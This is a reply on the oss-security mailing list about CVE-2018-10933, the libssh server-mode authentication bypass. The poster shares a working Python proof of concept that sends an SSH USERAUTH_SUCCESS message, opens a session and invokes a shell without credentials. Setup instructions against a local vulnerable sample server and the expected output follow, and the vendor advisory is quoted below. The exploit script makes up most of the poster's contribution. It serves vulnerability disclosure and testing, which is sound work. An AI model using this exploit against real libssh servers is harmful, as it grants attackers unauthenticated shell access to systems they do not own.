Date: Wed, 17 Oct 2018 16:13:24 +0700 From: Minh Tuan Luong <not.soledad@...il.com> To: oss-security@...ts.openwall.com Subject: Re: CVE-2018-10933: libssh: authentication bypass in server code I have coded a simple POC for this CVE: --- CVE-2018-10933.py ---- import paramiko import socket import sys nbytes = 4096 hostname = "127.0.0.1" port = 2222 sock = socket.socket() try: sock.connect((hostname, port)) # instantiate transport m = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(m) cmd_channel = transport.open_session() cmd_channel.invoke_shell() except socket.error: print '[-] Connecting to host failed. Please check the specified host and port.' sys.exit(1) ----- to test this code: get vulnerable version of libssh at homepage: https://www.libssh.org/files/0.7/libssh-0.7.4.tar.xz after uncompress and build, go to example directory, there's a simple sshd server using libssh name: samplesshd-cb run this simple sshd by command: $ samplesshd-cb 127.0.0.1 -p 2222 then run my code, output will be: Allocated session channel Allocated shell mean that i can bypass authentication and spawn a shell without any credential Regard, Soledad On 10/16/2018 7:21 PM, Marcus Meissner wrote: > Hi, > > https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/ > > ----- > libssh 0.8.4 and 0.7.6 security and bugfix release > > This is an important security and maintenance release in order to address CVE-2018-10933. > > libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authentciate without any credentials. > > The bug was discovered by Peter Winter-Smith of NCC Group. > ----- > > This only affects libssh operating in _server_ mode, but not the usual used client mode. > > Ciao, Marcus
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.